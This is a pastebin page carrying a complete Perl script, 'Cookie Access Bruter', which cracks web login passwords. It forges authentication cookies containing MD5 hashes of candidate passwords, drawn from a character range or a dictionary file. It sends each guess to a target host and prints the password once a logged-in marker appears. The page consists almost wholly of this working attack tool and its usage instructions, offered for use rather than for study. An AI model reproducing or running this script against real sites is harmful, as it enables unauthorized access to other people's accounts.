KinG-InFeT.NeT ~ No-Paste

Titolo: Cookie Access Brute Autore: darkjoker Data: 20.09.09 Numero Linee:    
  1. ######################################################################################################
  2. #
  3. # Author: darkjoker
  4. #
  5. # Site: http://xhacker.altervista.org
  6. #
  7. # Program name: Cookie Access Bruter
  8. #
  9. # Usage: perl script.pl <host> <page> <username> <cookie> <refer> <method> <info method>
  10. #
  11. # <host>: Hostname of site
  12. #
  13. # <page>: Login page
  14. #
  15. # <username>: Username to found password
  16. #
  17. # <cookie>: cookie sent from the server after the login. HTTP request-syntax (no space in middle)
  18. #
  19. # <refer>: a text wich appear only if logged in
  20. #
  21. # <method>: bruteforce (use force) or dictionary attack (use diz)
  22. #
  23. # <info method>: in bruteforce chose the letter that will be used (a:z whill try all chars from a to z)
  24. #		 in dictionary attack use the dictionary file name.
  25. #
  26. #######################################################################################################
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35. #!/usr/bin/perl
  36. use Digest::MD5 qw(md5_hex);
  37. use IO::Socket;
  38. my ($host, $page, $username, $cookie, $refer, $method, $info_method) = @ARGV or die "Usage: perl $0 <host> <page> <username> <cookie> <refer> <method> <info method>\n";
  39. $cookie =~ s/username/$username/;
  40. if ($method =~ /force/){
  41. 	@val = split (":", $info_method);
  42. 	foreach (@val [0] .. @val [1]){
  43. 		my $sock = new IO::Socket::INET (
  44. 			PeerHost => $host,
  45. 			PeerPort => "80",
  46. 			Proto => "tcp"
  47. 		) or die "Unable to connect to the server\n";
  48. 		$cont = "";
  49. 		$pass = $_;
  50. 		$pass_md5 = md5_hex ($pass);
  51. 		$cookie =~ s/password/$pass_md5/i;
  52.  
  53. 		print $sock "GET $page HTTP/1.0\r\nHost: $host\r\nCookie: $cookie\r\n\r\n";
  54. 		while (<$sock>){
  55. 			$cont .= $_;
  56. 		}
  57. 		if ($cont =~ /$refer/){
  58. 			print "Password: " . $pass . "\n";
  59. 			exit ();
  60. 		}
  61. 		$cookie =~ s/$pass_md5/password/i;
  62. 		close ($sock);
  63. 	}
  64. }
  65. elsif ($method =~ /diz/){
  66. 	open (DIZ, $info_method) or die "Unable to open the file\n";
  67. 	while ($pass = <DIZ>){
  68. 		chomp ($pass);
  69.                my $sock = new IO::Socket::INET (
  70. 	       		PeerHost => $host,
  71. 			PeerPort => "80",
  72. 			Proto => "tcp",
  73. 		) or die "Unable to connect to the server\n";
  74. 		$cont = "";
  75. 		$pass_md5 = md5_hex ($pass);
  76. 		$cookie =~ s/password/$pass_md5/i;
  77. 		print $sock "GET $page HTTP/1.0\r\nHost: $host\r\nCookie: $cookie\r\n\r\n";
  78. 		while (<$sock>){
  79. 			$cont .= $_;
  80. 		}
  81. 		if ($cont =~ /$refer/){
  82. 			print "Password: " . $pass . "\n";
  83. 			exit ();
  84. 		}
  85. 		$cookie =~ s/$pass_md5/password/i;
  86.  
  87. 		close ($sock);
  88.  
  89. 	}
  90.  
  91. 	close (DIZ);
  92. }
  93. else {
  94. 	die "Unknow method\n";
  95. }
  96. print "Password not found\n";
  97.  


Powered By 0xPaste
Versione: v1.6



[-Administration Panel-]